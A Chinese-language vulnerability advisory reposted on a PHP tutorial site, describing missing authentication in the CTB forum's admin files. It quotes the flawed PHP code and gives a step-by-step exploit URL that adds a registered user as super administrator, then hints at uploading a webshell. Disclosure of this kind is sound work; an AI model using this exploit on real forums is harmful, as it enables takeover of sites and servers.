当前位置: 首页 > 图文教程 > 网络编程 > PHP > 漂亮但不安全的CTB

PHP
PHP Tokenizer 学习笔记
三步搞定phpwind的静态化部署
DEDE5.3把tag标签逗号改成空格的方法分享
实例解析:从IIS的ASP迁移到APACHE的PHP
PHP读取Excel 之 Spreadsheet_Excel_Reader
PHP导出Excel 之 Spreadsheet_Excel_Writer
PDO不推广,PHP得不到发展
勇于创新,激情开拓新的未来
PHPCMS开发文档里看到PHP编码规范
一个模版引擎的诞生 开发者的思考
关于PHP开发框架
开发框架的选择和设计经验谈
框架带给我们什么(浅谈PHP框架对PHP发展的影响)
通过PHP实现DataGrid功能
php curl函数应用方法之模拟浏览器
单汉字转UNICODE
php在线打包/解包
listdir($dir) 目录读取函数
使用Apache的rewrite技术
php正则

PHP 中的 漂亮但不安全的CTB


出处:互联网   整理: 软晨网(RuanChen.com)   发布: 2009-09-13   浏览: 84 ::
收藏到网摘: n/a


>>>Dedicated This Scrap To CaoJing<<<
涉及版本:
^^^^^^^
目前所有版本(现在1.3Alpha为最高版本)
描述:
^^^^^^
CTB是一款由实易数码<11cn.org>;开发和维护的源代码开放的PHP论坛。由于其后台管理文件验证存在缺陷,可能导致非法用户直接添加论坛超级管理员,进而威胁论坛或服务器安全。
具体:
^^^^
CTB书写非常规范,代码井然有序,赏心悦目,的确是优美的程序;特别是其功能模块,着实让小弟学习了一把。但安全方面却令人堪忧:
试看如下代码:
/admin/main.php
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
//获取get变量
if( is_array($_GET) ) {
foreach($_GET as $k=>$v) {
if( is_array( $_GET[$k]) ) {
foreach($_GET[$k] as $k2=>$v2) {
$return[$k][$k2] = $v2;
}
} else {
$return[$k] = $v;
}
}
}
...
$mod = isset($_GET['mod']) ? $_GET['mod'] : $_POST['mod'];
if (!file_exists($mod.".php" {
$mod = "mainright";
}
require_once ($mod.".php";
//-----------------------------------------------------------------------------
//初始化类变量
$ctb = new Module;
$ctb->set = $set;
$ctb->tplPath = "./templates";
$ctb->input = $return;
$ctb->sess = isset($_COOKIE["sess_adminname"]) ? $_COOKIE : $_SESSION;
$ctb->execute();
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
这里没有任何验证,我们看看添加管理员的文件:
/admin/systemuser.php
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
class Module extends CommonClass
//系统管理模块子类
{
function execute() {
switch($this->input['action']) {
...
case 'addSystemUser':
$this->addSystemUser();
break;
...
}
}
function addSystemUser()
{
//输入数据简单格式化
$this->inputCheck("main.php?mod=systemuser&action=showSystemUser";
//执行添加操作
$this->file = "../".$this->set[dataPath]."/users/list.php";
$systemLine = $this->select(4, $this->input['systemUserName']);
....
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
依然没有验证,一路顺利啊!
利用方法:
^^^^^^^
先注册一个用户:
登陆ID: cat
用户名 : dog
密码: ilikecat
重复密码: ilikecat
信箱: [email protected]
接着提交如下URL:
http://www.target.com/ctb/admin/main.php?mod=systemuser&systemUserName=dog&systemUserMode=1&action=addSystemUser
哈哈,你现在已经是超级管理员了,不相信?提交如下URL后台登陆:
http://www.psych.com/ctb/admin/main.php?mod=login
管理名称: cat
管理密码: ilikecat
咦...还真成功了!
你现在是不是想更改后台上传文件类型,然后upload webshell?哼,被我猜到了吧...
后记:另外发现CTB代码注释有些扎眼的错别字,大煞风景,希望可以一起修正。